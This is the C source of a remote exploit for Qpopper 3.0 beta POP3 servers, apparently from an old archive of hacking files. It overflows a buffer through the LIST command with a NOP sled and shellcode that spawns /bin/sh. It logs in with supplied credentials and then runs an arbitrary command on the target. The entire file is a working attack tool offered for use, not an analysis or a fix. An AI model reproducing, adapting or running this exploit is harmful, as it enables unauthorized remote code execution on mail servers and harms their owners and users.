home *** CD-ROM | disk | FTP | other *** search
- /*
- * !Hispahack Research Team
- * http://hispahack.ccc.de
- *
- * By Zhodiac <zhodiac@softhome.net>
- *
- * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
- * Overflow at pop_list()->pop_msg()
- *
- * Tested: (overflowable)
- *
- * 3.0beta28 offset=0
- * 3.0beta26 offset=0
- * 3.0beta25 offset=0
- *
- * Untested: (but overflowable)
- *
- * 3.0beta29
- * 3.0beta28
- * 3.0beta27
- * 3.0beta26
- * 3.0beta25
- * 3.0beta24
- * 3.0beta23
- * 3.0beta22
- * 3.0beta21
- * 3.0beta20
- * 3.0beta19
- * 3.0beta18
- * 3.0beta17
- * 3.0beta16
- * 3.0beta15
- * 3.0beta14
- * 3.0beta13
- * 3.0beta12
- * 3.0beta11
- * 3.0beta10
- * 3.0beta9
- * 3.0beta8
- * 3.0beta7
- * 3.0beta6
- * 3.0beta5
- * 3.0beta4
- * 3.0beta3
- * 3.0beta2
- * 3.0beta1
- * 3.0 *
- *
- * #include <standar/disclaimer.h>
- *
- * This code is dedicated to my love [CrAsH]] and to all the people who
- * were raided in Spain in the last few days.
- *
- * Madrid 10/1/2000
- *
- * missnglnk <missnglnk@tribune.intranova.net>
- * - Allows you to specify the command to execute on the remote host,
- * and added network support to the program so you do not need netcat
- * to use this.
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netdb.h>
- #include <netinet/in.h>
- #include <arpa/inet.h>
-
- #define BUFFERSIZE 1004
- #define NOP 0x90
- #define OFFSET 0xbfffd9c4
- // #define OFFSET 0x0
-
- char shellcode[]=
- "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
- "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
- "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";
-
-
- void usage(char *progname)
- {
- fprintf(stderr,"Usage: (%s <hostname> <login> <password> <command> [<offset>]\n",progname);
- exit(1);
- }
-
- int main(int argc, char **argv)
- {
- char *ptr,buffer[BUFFERSIZE],rcvbuf[4096],username[128],password[128],exploit[4096],command[4096];
- unsigned long *long_ptr,offset=OFFSET;
- int aux,sock;
- struct sockaddr_in sin;
- unsigned long ip;
- struct hostent *he;
-
- fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
- fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n");
-
- if (argc<5) usage(argv[0]);
-
- if (argc==6) offset+=atol(argv[5]);
-
- ptr=buffer;
- memset(ptr,0,sizeof(buffer));
- memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
- ptr+=sizeof(buffer)-strlen(shellcode)-16;
- memcpy(ptr,shellcode,strlen(shellcode));
- ptr+=strlen(shellcode);
- long_ptr=(unsigned long*)ptr;
- for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
- ptr=(char *)long_ptr;
- *ptr='\0';
-
- fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
- fprintf(stderr,"Offset: 0x%lx\n\n",offset);
-
- snprintf(username, sizeof(username), "USER %s\n",argv[2]);
- snprintf(password, sizeof(password), "PASS %s\n",argv[3]);
- snprintf(exploit, sizeof(exploit), "LIST 1 %s\n",buffer);
- snprintf(command, sizeof(command), "%s\n", argv[4]);
-
- if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
- {
- perror("socket()");
- return -1;
- }
-
- if ((he = gethostbyname(argv[1])) != NULL)
- {
- ip = *(unsigned long *)he->h_addr;
- }
- else
- {
- if ((ip = inet_addr(argv[1])) == NULL)
- {
- perror("inet_addr()");
- return -1;
- }
- }
-
- sin.sin_family = AF_INET;
- sin.sin_addr.s_addr = ip;
- sin.sin_port = htons(110);
-
- if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
- {
- perror("connect()");
- return -1;
- }
-
- if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
- {
- perror("read()");
- return -1;
- }
-
- if (strstr(rcvbuf, "+OK") == NULL)
- {
- printf("Server didnt respond with ok\n");
- rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
- printf("\t%s\n", rcvbuf);
- return -1;
- }
-
- rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
- printf("\t%s\n", rcvbuf);
- bzero(rcvbuf, sizeof(rcvbuf));
-
- if (write(sock, username, strlen(username)) < strlen(username))
- {
- perror("write()");
- return -1;
- }
-
- if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
- {
- perror("read()");
- return -1;
- }
-
- if (strstr(rcvbuf, "+OK") == NULL)
- {
- printf("Server didnt respond with username ok\n");
- rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
- printf("\t%s\n", rcvbuf);
- return -1;
- }
-
- rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
- printf("\t%s\n", rcvbuf);
- bzero(rcvbuf, sizeof(rcvbuf));
-
- if (write(sock, password, strlen(password)) < strlen(password))
- {
- perror("write()");
- return -1;
- }
-
- if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
- {
- perror("read()");
- return -1;
- }
-
- if (strstr(rcvbuf, "+OK") == NULL)
- {
- printf("Server didnt respond with password ok\n");
- rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
- printf("\t%s\n", rcvbuf);
- return -1;
- }
-
- rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
- printf("\t%s\n", rcvbuf);
- bzero(rcvbuf, sizeof(rcvbuf));
-
- if (write(sock, exploit, strlen(exploit)) < strlen(exploit))
- {
- perror("write()");
- return -1;
- }
-
- if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
- {
- perror("read()");
- return -1;
- }
-
- rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
- printf("\t%s\n", rcvbuf);
- bzero(rcvbuf, sizeof(rcvbuf));
-
- if (write(sock, command, strlen(command)) < strlen(command))
- {
- perror("write()");
- return -1;
- }
-
- if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
- {
- perror("read()");
- return -1;
- }
-
- rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
- printf("\t%s\n", rcvbuf);
- bzero(rcvbuf, sizeof(rcvbuf));
-
- if (close(sock) < 0)
- {
- perror("close()");
- return -1;
- }
-
- return(0);
- }
- /* www.hack.co.za [29 Feb 2000]*/